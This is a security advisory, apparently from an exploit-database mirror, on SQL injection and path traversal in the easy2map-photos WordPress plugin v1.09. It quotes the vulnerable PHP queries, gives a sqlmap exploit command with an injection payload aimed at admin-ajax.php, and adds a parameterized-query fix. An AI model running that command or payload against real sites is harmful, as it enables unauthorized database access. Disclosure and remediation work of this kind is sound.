Title: SQL Injection in easy2map-photos wordpress plugin v1.09
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map-photos
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.1.0
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=130

Description:
Easy2Map Photos is a simple-yet-powerful tool for generating great-looking geo-tagged photo galleries.

Vulnerability:
The following lines in includes/Functions.php are vulnerable to SQL injection because the queries are not parameterized and user input is not sanitized.

    // includes/Functions.php, lines 48-50
    $wpdb->query(sprintf("UPDATE $mapsTable
        SET PolyLines = '%s'
        WHERE ID = '%s';", $PolyLines, $mapID));

    // includes/Functions.php, lines 218-235
    $wpdb->query(sprintf("
        UPDATE $mapsTable
        SET TemplateID = '%s',
            MapName = '%s',
            Settings = '%s',
            CSSValues = '%s',
            CSSValuesPhoto = '%s',
            CSSValuesMap = '%s',
            MapHTML = '%s',
            IsActive = 1
        WHERE ID = %s;",
        $_REQUEST['mapTemplateName'],
        $_REQUEST['mapName'],
        urldecode($_REQUEST['mapSettingsXML']),
        urldecode($_REQUEST["parentCSSXML"]),
        urldecode($_REQUEST["photoCSSXML"]),
        urldecode($_REQUEST["mapCSSXML"]),
        urldecode($_REQUEST["mapHTML"]), $mapID));

    // includes/Functions.php, lines 238-254
    //this is a map insert
    if (!$wpdb->query(sprintf("
        INSERT INTO $mapsTable(
            TemplateID,
            MapName,
            DefaultPinImage,
            Settings,
            LastInvoked,
            PolyLines,
            CSSValues,
            CSSValuesPhoto,
            CSSValuesMap,
            MapHTML,
            IsActive
        ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s' , 0);",
        $_REQUEST['mapTemplateName'],
        $_REQUEST['mapName']

    // includes/Functions.php, lines 331-337
    $wpdb->query(sprintf("
        UPDATE $mapsTable
        SET MapName = '%s'
            IsActive = 1
        WHERE ID = %s;",
        $_REQUEST['mapName'],
        $mapID));

Also, in MapPinImageUpload.php and MapPinIconSave.php, this code would allow someone to create files outside of the intended upload directory by adding ../../../../ path traversal characters:

    if (!file_exists($imagesDirectory)) {
        mkdir($imagesDirectory);
    }

CVEID: 2015-4615 2015-4617
OSVDB:

Exploit Code:

    $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3

# Iranian Exploit DataBase = http://IeDb.Ir [2015-07-10]
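
Added example (not the plugin's code and not the vendor's v1.1.0 fix): the map-name UPDATE from includes/Functions.php lines 331-337 rewritten with bound parameters and an integer check on mapID. PDO with an in-memory SQLite table stands in for $wpdb so it runs outside WordPress; the table name, sample rows and the helper save_map_name() are assumptions made for illustration.

```php
<?php
// Added example. SQLite in memory stands in for the WordPress database;
// the table name "maps" and both rows are constructed for illustration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE maps (ID INTEGER PRIMARY KEY, MapName TEXT, IsActive INTEGER)');
$db->exec("INSERT INTO maps VALUES (11, 'old name', 0), (12, 'other map', 0)");

// Hypothetical helper: bound-parameter form of the UPDATE at lines 331-337.
function save_map_name(PDO $db, $rawMapID, $rawMapName): int
{
    // mapID has to be a positive integer; anything else is refused.
    $mapID = filter_var($rawMapID, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($mapID === false) {
        throw new InvalidArgumentException('mapID must be a positive integer');
    }
    // Request parameters can arrive as arrays; only a string is a valid name.
    if (!is_string($rawMapName)) {
        throw new InvalidArgumentException('mapName must be a string');
    }
    // The SQL text is constant. Values are bound, so a quote in the name
    // is stored as data and cannot end the string literal.
    $stmt = $db->prepare('UPDATE maps SET MapName = :name, IsActive = 1 WHERE ID = :id');
    $stmt->bindValue(':name', $rawMapName, PDO::PARAM_STR);
    $stmt->bindValue(':id', $mapID, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount(); // number of rows the UPDATE touched
}

// The mapName value from the advisory's request, URL-decoded.
$name = "' or 1==1;";
printf("rows updated: %d\n", save_map_name($db, '11', $name));

// Row 11 now holds the literal string; row 12 is untouched.
foreach ($db->query('SELECT ID, MapName, IsActive FROM maps ORDER BY ID') as $row) {
    printf("%d | %s | %d\n", $row['ID'], $row['MapName'], $row['IsActive']);
}

// A mapID that is not a plain integer never reaches the database.
try {
    save_map_name($db, "11' or 1==1;", 'x');
} catch (InvalidArgumentException $e) {
    printf("rejected: %s\n", $e->getMessage());
}
```

Inside WordPress the same binding is done with `$wpdb->prepare()`, using `%s` for the name and `%d` for the ID, and passing the prepared string to `$wpdb->query()`.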